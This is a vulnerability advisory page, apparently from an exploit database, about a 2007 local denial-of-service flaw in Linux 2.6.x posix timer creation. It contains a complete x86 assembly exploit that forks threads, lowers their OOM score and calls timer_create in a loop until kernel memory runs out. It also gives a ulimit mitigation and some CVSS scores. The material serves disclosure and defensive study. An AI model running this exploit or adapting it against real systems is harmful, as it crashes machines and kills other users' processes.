Linux Kernel Local DoS vulnerability.

2007.02.27
Credit: fingerout
Risk: Low
Local: Yes
Remote: No
CWE: CWE-Other


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello. I'd like to present one of Linux Kernel vulnerabilities. As far as I know, this one affects 2.6.x kernels. Problem - -- The problem lies in sys_timer_create() in Linux/kernel/posix-timers.c. Each time user creates a posix timer, some kernel memory is allocated. Since count of timers that can be created by user is limited only by sigqueue size (ex. 4294967295 in Debian) every local user can exhaust all avaible memory which will trigger oom_killer (mm/oom_kill.c). If a process itself uses a small amount of memory, it's oom_score will be low, so all other processes would be killed. Exploit - -- - --------------8<--------------------- ;nasm -f elf noHeaven.asm ;ld -s -o noHeaven noHeaven.o section .text global _start count equ 8 ; threads count - do it quicker _start: mov ebx, count call create_threads jmp done _pause: mov eax,29 int 0x80 ret create_threads: mov eax,2 int 0x80 test eax,eax jz consume dec ebx test ebx,ebx jnz create_threads ret consume: setsid: ; so we won't get counted as one thread in oom_killer() xor ebx,ebx ; each task will have about 20 oom_score which mov eax,66 ; is less than 'init' and others int 0x80 push eax loopek: mov eax,259 mov ebx,0 mov ecx,0 mov edx,esp int 0x80 jmp loopek done: xor ebx,ebx mov eax,1 int 0x80 - --------------8<-------------------- Fix - -- In my opinion the easiest way to defend is to enforce pending signals queue size rlimit (ulimit -i). Vendor notification status - -- Vendor refused to fix this kind of bugs. - -- Regards, fingerout -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEMwAY3AGvlpYpo4cRApESAJ9PPyZaHz5HExrh15pQdH51I3di+wCfee87 hqrfQZpKiyqugdZoabAHy9g= =9y9Y -----END PGP SIGNATURE-----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top